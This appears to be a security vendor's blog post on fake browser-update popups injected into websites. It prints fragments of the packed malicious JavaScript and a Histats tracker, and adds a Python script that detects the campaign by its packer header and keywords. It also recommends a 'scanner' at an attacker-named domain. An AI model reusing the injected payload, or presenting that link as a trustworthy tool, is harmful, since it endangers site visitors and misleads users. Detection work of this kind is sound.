Thousands of websites infected by Fake Outdated Browser malware and popups

Our security scanners detected thousands of websites recently infected by this fake outdated-browser update malware. It shows a popup window asking the visitor to update their outdated browser by clicking the “Update” button, which links to malicious .exe or .zip files meant to infect their computers.

The malware targets Firefox, Chrome, IE and other browsers, and it shows a customized popup window to match the browser you are using.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The malware is usually injected into .js files. Here is an example of the malicious JavaScript:


<script type=”text/javascript“> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k

REMOVED…

REMOVED…

REMOVED…

rm|ul|secure|setCookie|update_2019_02|lookupRedirect|saoverlay|inherit|1000|footer_button|setStr|weight|bShowPassed|Uint8Array|array|getCookie|none|modal_h|Update|subarray|35px|search|position|enc1|translate|filename|of|isIEponents|24px|0px|possible|outdated|this|sAdsUrl2|as|content|set_|15px|18px|flexbox|setTime|substring|items|opera|isChrome|init_Chrome|h1|isOpera|D1|td|init_Firefox|viettellamdong|jm|isFirefox|Opera|ActiveXObject|h2|init_Opera|init_Edge|business|label|h5|init_Safari|h4|XMLHTTP|isEdge|init_Android|Safari|attr|h3|init_IE|Chrome|marketing

REMOVED…

REMOVED…

REMOVED…

pssacS|Ci9PSpH|F5zqjAc|Firefox|firefox|sLqiUR0|Internet|forEach|call|querySelectorAll|default|switch|Explorer|ie|wicS3do|caption|baseline|due|version|table|soon|occurred|has|sBB68wf|Center|critical|The||following|personal|and|stored|Loss|versions|are|also|on|stream|octet|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|match|Za|Int32Array|Uint32Array|Array|byteLength|set|z0|||while|removeChild|revokeObjectURL|application|click|appendChild|Blob|createElement|createObjectURL|Confidential|your|small|strong|sub|samp|kbd|em|ins|sup|tt|fieldset|form|legend|ol|dd|dl|dt|dfn|strike|leak|blockquote|address|iframe|onclick|html|pre|applet|abbr|information|big|code|cite|h6|del’.split(‘|’),0,{})) </script> <script type=”text/javascript“>var _Hasync= _Hasync|| []; _Hasync.push([‘Histats.start’, ‘1,4214393,4,0,0,0,00010000’]); _Hasync.push([‘Histats.fasi’, ‘1’]); _Hasync.push([‘Histats.track_hits’, ”]); (function() { var hs = document.createElement(‘script’); hs.type = ‘text/javascript’; hs.async = true; hs.src = (‘//s10.histats.com/js15_as.js’); (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]).appendChild(hs); })();</script> <noscript><a href=”/” target=”_blank”><img src=”//sstatic1.histats.com/0.gif?4214393&101″ alt=”counter customizable free hit” border=”0″></a></noscript> <script type=”text/javascript“> </script>
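To check your own site's .js files for this kind of injection, the following added example (not code from the original article or from any scanner product) looks for the packer header seen in the sample and compares the packed keyword list against identifiers visible in it. The function names, the indicator grouping and the two constructed samples are assumptions made for illustration.

```python
import re
from pathlib import Path

# Dean Edwards-style packer header, as at the start of the sample above.
PACKER_RE = re.compile(r"eval\s*\(\s*function\s*\(\s*p,a,c,k,e,[dr]\s*\)")
# Packed scripts carry their identifiers as '<a|b|c>'.split('|'); accept
# straight or typographic quotes, since copied samples often have the latter.
Q = "['\u2018\u2019]"
WORDLIST_RE = re.compile(Q + r"([^'\u2018\u2019]*\|[^'\u2018\u2019]*)" + Q
                         + r"\s*\.split\(\s*" + Q + r"\|" + Q + r"\s*\)")

# Indicator groups (hypothetical grouping) built from keywords in the sample.
INDICATORS = {
    "browser_sniffing": {"isChrome", "isFirefox", "isOpera", "isEdge",
                         "init_Chrome", "init_Firefox", "init_IE"},
    "fake_update_ui": {"outdated", "Update", "critical", "saoverlay",
                       "update_2019_02"},
    "file_drop": {"Blob", "createObjectURL", "revokeObjectURL", "octet"},
}

def scan_js(text):
    """Return a finding for one file's contents, or None if no packer is found."""
    if not PACKER_RE.search(text):
        return None
    words = set()
    for m in WORDLIST_RE.finditer(text):
        words.update(w for w in m.group(1).split("|") if w)
    hits = {name: sorted(words & ind) for name, ind in INDICATORS.items()}
    hits = {name: found for name, found in hits.items() if found}
    # The packer also appears in legitimate code, so flag the campaign only
    # when all three groups match; otherwise report it for manual review.
    full = len(hits) == len(INDICATORS)
    return {"verdict": "fake-browser-update" if full else "packed-script",
            "hits": hits}

def scan_tree(root):
    """Scan every .js file under root; return {path: finding} for packed files."""
    found = {}
    for path in Path(root).rglob("*.js"):
        result = scan_js(path.read_text(encoding="utf-8", errors="replace"))
        if result:
            found[str(path)] = result
    return found

# Constructed samples (not real payloads): packer header, placeholder body.
SAMPLE_INFECTED = ("eval(function(p,a,c,k,e,d){/*body omitted*/}('0 1',2,2,'isChrome|"
    "init_Firefox|outdated|Update|saoverlay|Blob|createObjectURL|octet'.split('|'),0,{}))")
SAMPLE_BENIGN = "eval(function(p,a,c,k,e,d){/*omitted*/}('0 1',2,2,'console|log'.split('|'),0,{}))"
```

A "packed-script" verdict only means the file contains packed code; compare such files against a known-good copy of the site before removing anything.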

When viewed in a browser:

Sign up and try our malware removal service, and let us clean and protect your websites!
